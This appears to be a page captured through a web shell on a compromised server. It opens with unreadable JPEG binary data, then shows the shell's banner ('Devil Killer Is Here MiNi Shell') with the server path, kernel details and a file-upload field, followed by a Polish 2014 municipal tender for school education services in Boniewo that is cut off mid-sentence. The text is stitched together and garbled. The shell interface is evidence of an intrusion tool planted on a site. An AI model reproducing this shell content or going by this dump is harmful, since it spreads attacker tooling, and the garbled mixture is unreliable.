JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140401/110220-N-2014.html

<p class="kh_header"><b>Boniewo: Wiedza szansą na lepszą przyszłość</b><br>
<b>Numer ogłoszenia: 110220 - 2014; data zamieszczenia: 01.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Boniewo , ul. Szkolna 28, 87-851 Boniewo, woj. kujawsko-pomorskie, tel. 54 2840124, faks 54 284 0671.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.boniewo.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wiedza szansą na lepszą przyszłość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usług  w zakresie prowadzenia zajęć edukacyjnych w Zespole Szkół w Boniewie  dla uczniów gimnazjum( chłopcy i dziewczęta )  w dniach oraz godzinach pracy szkoły w czasie uzgodnionym z Dyrektorem szkoły. 
  
w ramach projektu POKL 9.1.2 pt. Wiedza szansą na lepszą przyszłość .
współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Zajęcia  będą realizowane od kwietnia 2014 do czerwca 2015 roku  , w roku szkolnym 2014/2015 .  Zajęcia realizowane  w projekcie mają przekazywać  również  niestereotypową wiedzę nt. możliwości wyborów  życiowych niezależnie od płci ucznia . 

Zajęcia , o których mowa wyżej prowadzone będą w ramach następujących części : 

Część I Zajęcia  matematyczno-przyrodnicze : 
Zajęcia matematyczno -przyrodnicze  z wykorzystaniem ICT (pierwszeństwo dla ucz. uzdolnionych) polegające na wyszukiwaniu i opracowywaniu (w formie prezentacji multimedialnej) zagadnień z biologii, chemii, fizyki, geografii  i matematyki:
-  2 grupy po 8 uczniów 1 h tygodniowo. Sprawdzian wiedzy po pierwszych i ostatnich zajęciach .

Część II Zajęcia z j. angielskiego  przeznaczone dla ucz. Uzdolnionych:
-3 grupy po 8 uczniów 1 h tygodniowo .Jedna z grup dla uczniów klasy III w celu przygotowania się do egzaminu gimnazjalnego. Sprawdzian wiedzy po pierwszych i ostatnich zajęciach .

Część III Zajęcia koła informatycznego oraz prowadzenie i aktualizacji  strony internetowej szkoły i projektu:
 - 2 grupy po 8 uczniów 1 h tygodniowo.

Część IV Edukacja ekologiczna -warsztaty ekologiczne dot. segregacji odpadów , sortowania odpadów, energii odnawialnej:
-4grupy  po 20 uczniów,  6h w semestrze. Przeprowadzenie ankiet przed i po realizacji zajęć 

Część V -Przedsiębiorczość -warsztaty z przedsiębiorczości (gry, zabawy, filmy dydaktyczne), wizyty w zakładach pracy(3x 20 os), spotkania z przedsiębiorcami(3x), opracowanie biznesplanu i reklamy :
- 3grupy po 20 uczniów w wymiarze 25h(1 grupa na  1 semestr). Test z podstaw przedsiębiorczości  po pierwszych i po ostatnich zajęciach , ankieta wyrównawcza przed i po realizacji zajęć.

Część VI Świadomość kulturalna - Warsztaty teatralne(zakończone przedstawieniem dla uczniów i rodziców):
- 1grupa ,  25 uczniów w wymiarze  30h , 1 godz. tygodniowo . Przeprowadzenie ankiet przed i po realizacji zajęć

Część VII- Tożsamość regionalna i wychowanie patriotyczne  -warsztaty rękodzieła ludowego:
- 1grupa ,  20 uczniów w wymiarze 15h .Przeprowadzenie ankiet przed i po realizacji zajęć.

Część VIII-  Doradztwo zawodowe -  w ramach zadania będą realizowane będą realizowane:
-Zajęcia indywidualne dla uczniów kl.III wspomagające świadome planowanie drogi edukacyjnej i zawodowej -30 uczniów, 2 h na 1 ucznia (60h) w okresie od kwietnia 2014 do 27.06.2014
Dla każdego ucznia  uczestniczącego w tym zadaniu powstanie indywidualny scenariusz edukacyjno - zawodowy. Wykonanie kart doradztwa , scenariusz edukacyjno-zawodowy na zakończenie realizacji zajęć, ankieta porównawcza po pierwszym i ostatnim doradztwie 

Część IX. Działanie Szkolnego Ośrodka Kariery-33 ucz. klas III oraz inni zainteresowani uczniowie z kl. I i II w wymiarze 5 h tygodniowo (1h dziennie)w okresie od 01.09.2014 do 26.06.2015
Dla każdego ucznia  uczestniczącego w tym zadaniu powstanie indywidualny scenariusz edukacyjno - zawodowy. Bloki tematyczne  realizowane w ramach SzOK:
- psychologiczne aspekty aktywizacji zawodowej,
- poznaje zawody,
-Kierunki dalszego kształcenia-przygotowanie uczniów do poruszania się po rynku szkół ponadgimnazjalnych
Ponadto każdy uczeń będzie brał udział w konsultacjach indywidualnych. Wykonanie kart doradztwa , scenariusz edukacyjno-zawodowy na zakończenie realizacji zajęć, ankieta porównawcza po pierwszym i ostatnim doradztwie.

Część X Zajęcia wyrównawcze  z chemii- 2 grupy po 8 uczniów 1 h tygodniowo. Jedna grupa dla uczniów klasy III przygotowujących  się do egzaminu gimnazjalnego. Sprawdzian wiedzy po pierwszych i ostatnich zajęciach

Część XI Zajęcia wyrównawcze z j.angielskiego-3 grupy po 8 uczniów 1 h tygodniowo. Jedna grupa dla uczniów klasy III przygotowujących  się do egzaminu gimnazjalnego. Sprawdzian wiedzy po pierwszych i ostatnich zajęciach


Część XII Zajęcia wyrównawcze z matematyki -3 grupy po 8 uczniów 1 h tygodniowo. Jedna grupa dla uczniów klasy III przygotowujących  się do egzaminu gimnazjalnego. Sprawdzian wiedzy po pierwszych i ostatnich zajęciach


Część  XIII  Zajęcia z języka polskiego dla uczniów z opinią o dysleksji rozwojowej-1 grupa,  8 uczniów 1 h tygodniowo. opinie pedagogów /wychowawców  bezpośrednio po zajęciach .

Część XIV Zajęcia specjalistyczne dla uczennicy niedowidzącej-1grupa  1 uczennica  1h tygodniowo. opinie pedagogów /wychowawców  bezpośrednio po zajęciach .

Jednocześnie w ramach wszystkich zajęć oprócz wymienionych dokumentów w poszczególnych częściach Wykonawcy zobowiązani są prowadzić miesięczne karty pracy oraz dzienniki zajęć . 

Część XV Koordynator szkolny - 28 godzin w miesiącu: monitoring na poziomie szkoły, we tym wizyty monitorujące na zajęciach i kontrola frekwencji, kontrola i obsługa logistyczna zajęć, spotkań i wycieczek, rekrutacja uczniów, promocja, tworzenie harmonogramów zajęć, przygotowanie danych do wniosku o płatność, współpraca przy opracowaniu raportu końcowego

Jedna godzina doradcy zawodowego - 60 minut 
Pozostałe zajęcia jedna godzina - 45 minut 

Gmina Boniewo udostępni sale z wyposażeniem  do prowadzenia zajęć w Zespole Szkół w Boniewie .

Przedmiot zamówienia został podzielony na 15  części, określonych w zestawieniu stanowiącym załącznik nr 1 do SIWZ. Wykonawca może złożyć ofertę na jedną lub więcej części.  
W ramach prowadzenia zajęć, Wykonawca zobowiązany jest również do:
1) współpracy z dyrektorem szkoły oraz  koordynatorem szkolnym  
2) przygotowania w formie pisemnej programu i planu pracy zajęć,
3) realizacji zajęć zgodnie z opracowanym programem zaakceptowanym przez dyrektora szkoły i koordynatora szkolnego,
4) przekazywania konspektu zajęć koordynatorowi szkolnemu,
5) przestrzegania obowiązków, zaleceń i terminów wynikających z realizacji umowy; opieka nad uczniami podczas zajęć, dbanie o bezpieczeństwo uczniów,
6) wspomagania promocji i ewaluacji projektu- w szczególności informowania o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego oraz współpracy z dyrektorem szkoły i koordynatorem szkolnymw mierzeniu postępu uczniów w zakresie rezultatów projektu,
7) dbałości o stan pomieszczeń, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu,
8)  bieżącego monitorowania  efektów zajęć i raportowania o stanie realizacji zajęć,
9)  rzetelnego prowadzenia dokumentacji z realizowanych zajęć - dzienników zajęć i innych wymaganych dokumentów ( listy obecności, karty czasu pracy, dokumentacji zdjęciowej)
10)  przygotowania materiałów do przeprowadzenia zajęć we własnym zakresie,
11)  stosowania we wszystkich materiałach logotypów Unii Europejskiej i Programu Operacyjnego Kapitał Ludzki zgodnie z księgą wizualizacji . 
12)  informowania na bieżąco koordynatora szkolnego o wszystkich zaistniałych problemach w realizacji projektu,
13)  informowania dyrektora szkoły o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem,
14)  niezwłocznego udostępnienia dokumentacji z zakresu realizacji umowy na żądanie uprawnionemu przedstawicielowi Zamawiającego, dyrektorowi szkoły, organowi kontrolującemu,
15)  obowiązek uwzględniania w trakcie zajęć zasady równości szans w przekazywanych treściach.
16)  przestrzegania przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. Z 2002 r. Nr 101 poz. 926 z późn. zm.) oraz rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. Nr 100, poz. 1024), 
17) Zamawiający zastrzega, że wszyscy Wykonawcy, przy udziale których ma zostać wykonane Zamówienie, mają obowiązek wzięcia udziału w spotkaniu organizacyjnym w siedzibie Zamawiającego w Boniewie , które odbędzie się w terminie wskazanym na piśmie przez Zamawiającego ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 79.42.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy mający prawo występowania w obrocie prawnym i spełniający niżej podane warunki: 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, 
2) posiadają wiedzę i doświadczenie, 
3) dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia 
4)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
5) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 

Przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą : spełnia, nie spełnia Z ubiegania się o udzielenie zamówienia publicznego wyklucza się: 
1) wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 i 2 Prawa zamówień publicznych
 2). Zamawiający zawiadomi równocześnie wykonawców, którzy zostali wykluczeni z postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne, z zastrzeżeniem art.92 ust.1 pkt3 ustawy.
3).Ofertę wykonawcy wykluczonego uznaje się za odrzuconą</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnieniem warunku będzie złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy PZP. Przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą : spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy niniejszego postępowania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;oraz złożenie oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

Zamawiający wymaga osób o kwalifikacjach : 

Część I Zajęcia  matematyczno-przyrodnicze : Studia minimum I stopnia (licencjat) lub studia podyplomowe z zakresu któregoś z przedmiotów matematyczno -przyrodniczych(  biologii, chemii, fizyki, geografii  lub matematyki). Kwalifikacje pedagogiczne. Minimum dwa lata doświadczenia w pracy z uczniami gimnazjum. Biegła znajomość obsługi programów komputerowych. 


Część II Zajęcia z j. angielskiego  
Studia minimum I stopnia (licencjat) z zakresu filologii angielskiej  lub inny dokument uprawniający do nauczania języka angielskiego. Kwalifikacje pedagogiczne. Minimum dwa lata doświadczenia w pracy z uczniami gimnazjum. Bardzo dobra znajomość podstawy programowej gimnazjum z zakresu języka angielskiego. Doświadczenie w przygotowywaniu uczniów  do egzaminu gimnazjalnego z zakresu języka angielskiego

Część III Zajęcia koła informatycznego oraz prowadzenie i aktualizacji  strony internetowej szkoły i projektu:
Studia minimum I stopnia (licencjat) lub studia podyplomowe z zakresu informatyki. Kwalifikacje pedagogiczne. Minimum dwa lata doświadczenia w pracy z uczniami gimnazjum. Biegła znajomość obsługi programów komputerowych. 


Część IV Edukacja ekologiczna -warsztaty ekologiczne 
Studia minimum I stopnia (licencjat) lub studia podyplomowe z zakresu   biologii, chemii lub przyrody. Kwalifikacje pedagogiczne. Minimum dwa lata doświadczenia w pracy z uczniami gimnazjum. 


Część V -Przedsiębiorczość -warsztaty z przedsiębiorczości  Studia minimum I stopnia (licencjat) lub studia podyplomowe z zakresu  wiedzy o społeczeństwie lub przedsiębiorczości. Kwalifikacje pedagogiczne. Minimum dwa lata doświadczenia w pracy z uczniami gimnazjum. Doświadczenie w prowadzeniu warsztatów z przedsiębiorczości dla uczniów gimnazjum.

Część VI Świadomość kulturalna - Warsztaty teatralne Studia minimum I stopnia (licencjat) lub studia podyplomowe z zakresu  filologii polskiej. Kwalifikacje pedagogiczne. Minimum dwa lata doświadczenia w pracy z uczniami gimnazjum. 


Część VII- Tożsamość regionalna i wychowanie patriotyczne  -warsztaty rękodzieła ludowego:

Studia minimum I stopnia (licencjat) lub studia podyplomowe z zakresu plastyki, sztuki lub inne uprawniające do nauczania  zajęć artystycznych, plastyki w gimnazjum. Kwalifikacje pedagogiczne. Minimum dwa lata doświadczenia w pracy z uczniami gimnazjum. 

Część VIII-  Doradztwo zawodowe  Studia minimum I stopnia (licencjat) lub studia podyplomowe z zakresu doradztwa zawodowego. Minimum dwa lata doświadczenia w pracy z uczniami gimnazjum. Doświadczenie w tworzeniu indywidualnych scenariuszy edukacyjno - zawodowych dla uczniów.

Część IX. Działanie Szkolnego Ośrodka Kariery- Studia minimum I stopnia (licencjat) lub studia podyplomowe z zakresu doradztwa zawodowego. Minimum dwa lata doświadczenia w pracy z uczniami gimnazjum. Doświadczenie w tworzeniu indywidualnych scenariuszy edukacyjno - zawodowych dla uczniów.. 

Część X Zajęcia wyrównawcze  z chemii  Studia minimum I stopnia (licencjat) lub studia podyplomowe z  chemii. Kwalifikacje pedagogiczne. Minimum dwa lata doświadczenia w pracy z uczniami gimnazjum. Bardzo dobra znajomość podstawy programowej gimnazjum z zakresu chemii. Doświadczenie w przygotowywaniu uczniów  do egzaminu gimnazjalnego z zakresu przedmiotów matematyczno-przyrodniczych.

Część XI Zajęcia wyrównawcze z j. angielskiego- Studia minimum I stopnia (licencjat) z zakresu filologii angielskiej  lub inny dokument uprawniający do nauczania języka angielskiego. Kwalifikacje pedagogiczne. Minimum dwa lata doświadczenia w pracy z uczniami gimnazjum. Bardzo dobra znajomość podstawy programowej gimnazjum z zakresu języka angielskiego. Doświadczenie w przygotowywaniu uczniów  do egzaminu gimnazjalnego z zakresu języka angielskiego

Część XII Zajęcia wyrównawcze z matematyki  Studia minimum I stopnia (licencjat) lub studia podyplomowe z   matematyki. Kwalifikacje pedagogiczne. Minimum dwa lata doświadczenia w pracy z uczniami gimnazjum. Bardzo dobra znajomość podstawy programowej gimnazjum z zakresu matematyki. Doświadczenie w przygotowywaniu uczniów  do egzaminu gimnazjalnego z matematyki


Czyś XIII  Zajęcia z języka polskiego dla uczniów z opinią o dysleksji rozwojowej- Studia minimum I stopnia (licencjat) z zakresu filologii polskiej. Kwalifikacje pedagogiczne. Minimum dwa lata doświadczenia w pracy z uczniami gimnazjum. 


Część XIV Zajęcia specjalistyczne dla uczennicy niedowidzącej- Studia minimum I stopnia (licencjat) z zakresu filologii polskiej. Kwalifikacje pedagogiczne. Minimum dwa lata doświadczenia w pracy z uczniami gimnazjum. 

Część XV Koordynator szkolny  . Studia drugiego stopnia, ukończone studia podyplomowe z zarządzania projektami, doświadczenie w realizacji projektów edukacyjnych ze środków zewnętrznych .

Przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą : spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnieniem warunku będzie złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy PZP. Przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą : spełnia, nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy (w formie aneksu), w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, warunków ich wprowadzenia: 
1) zmiany osoby prowadzącej zajęcia, jednak z zastrzeżeniem, że osoba realizująca zajęcia w ramach zastępstwa  winna posiadać kwalifikacje określone dla danego typu zajęć lub warsztatów,
2) zmiany liczby godzin zajęć,
3) zmiany liczby dzieci biorących udział w projekcie,
4) zmiana wynagrodzenia, w przypadku ustawowej zmiany przepisów,
5) termin realizacji:
- w przypadku wystąpienia sytuacji niemożliwej do przewidzenia w chwili zawarcia umowy, a mającej wpływ na jej realizację,
- wstrzymania zajęć, z przyczyn niezależnych od Wykonawcy, przez uprawniony organ.

Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.

stotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy,  dopuszczalne są tylko pod następującymi warunkami:
1) zmiany nie mogą powodować zwiększenia wynagrodzenia Wykonawcy .
2) zmiana osób przewidzianych do realizacji zamówienia może nastąpić tylko na osoby o kwalifikacjach zawodowych równorzędnych lub wyższych do kwalifikacji, które podlegały ocenie,
